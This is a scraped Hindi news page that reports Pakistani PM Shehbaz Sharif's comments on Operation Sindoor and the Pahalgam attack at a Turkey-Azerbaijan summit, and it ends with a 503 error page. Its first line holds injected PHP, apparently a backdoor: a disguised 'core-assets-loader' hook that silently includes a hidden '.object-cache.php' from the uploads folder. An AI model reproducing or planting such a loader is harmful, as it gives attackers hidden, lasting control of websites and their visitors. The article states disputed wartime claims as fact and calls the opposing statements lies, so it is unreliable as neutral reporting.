add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ऑपरेशन सिंदूर से घबराए शहबाज शरीफ, आसिम मुनीर को मीटिंग के बीच में कर दिया खड़ा, बोले- ‘फज्र की नमाज से पहले…’ – SOCH INDIA
Menu

देश
ऑपरेशन सिंदूर से घबराए शहबाज शरीफ, आसिम मुनीर को मीटिंग के बीच में कर दिया खड़ा, बोले- ‘फज्र की नमाज से पहले…’

nobanner

पाकिस्तान को ऑपरेशन सिंदूर के दौरान भारी नुकसान हुआ था. इसके बाद पाक प्रधानमंत्री शहबाज शरीफ विदेश दौरे पर निकल गए. वे हर जगह जाकर कह रहे हैं कि पाकिस्तान ने भारत को तगड़ा जवाब दिया. शहबाज पाक आर्मी चीफ आसिम मुनीर को हर जगह खड़ा कर देते हैं और झूठी तारीफ करते हैं. इस बीच एक और वाकया सामने आया है. शहबाज ने अपने भाषण के दौरान तुर्किए में फील्ड मार्शल आसिम मुनीर को खड़ा कर दिया.

दरअसल पाक प्रधानमंत्री शहबाज शरीफ ने पाकिस्तान-तुर्किए-अजरबैजान ट्रिलैटरल समिट में हिस्सा लिया. वे इस दौरान झूठ बोलने से बाज नहीं आए. शहबाज ने ऑपरेशन सिंदूर का जिक्र करते हुए कहा कि भारत ने हम पर हमला कर दिया. इसकी जवाबी कार्रवाई में पाक की वायुसेना ने ताकत दिखाई और उसके 6 एयरक्राफ्ट गिरा दिए. शहबाज ने आर्मी चीफ आसिम मुनीर की तारीफ में कसीदे पढ़े. उनका सभी से परिचय करवाने के लिए मीटिंग के बीच खड़ा कर दिया.

पहलगाम आतंकी हमले पर बड़ा झूठ बोल गए शहबाज

पहलगाम आतंकी हमले में 26 लोगों की जान गई थी. इसमें पाक का हाथ था, लेकिन शहबाज इस मसले पर भी झूठ बोल गए. उन्होंने कहा कि पाकिस्तान शांति प्रिय देश है. पाकिस्तानी अखबर ‘बिजनेस रिकॉर्डर’ के मुताबिक भारत के साथ हुए संघर्ष का जिक्र करते हुए शहबाज ने कहा, “भारत अभी तक पाकिस्तान के खिलाफ कोई विश्वसनीय सबूत पेश नहीं कर पाया है और उसने न ही पहलगाम की घटना की किसी भी अंतरराष्ट्रीय संस्था जांच करवाई है. भारत ने हमारा प्रस्ताव नहीं माना.”

पाकिस्तान हमले का पहले ही बना चुका था प्लान

रिपोर्ट्स के मुताबिक शहबाज ने खुद यह बात मानी है कि वे भारत पर फज्र की नमाज के बाद हमला करने वाले थे, लेकिन भारत ने पहले ही जवाबी कार्रवाई शुरू कर दी थी. पाकिस्तानी सेना ने ऑपरेशन सिंदूर के बाद भारतीय शहरों को निशाना बनाने की कोशिश की थी, लेकिन भारतीय सेना ने जवाबी कार्रवाई में उसे तगड़ा झटका दे दिया. सेना ने पाकिस्तान के मुरीदके और नूरखान एयरबेस को काफी नुकसान पहुंचाया.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.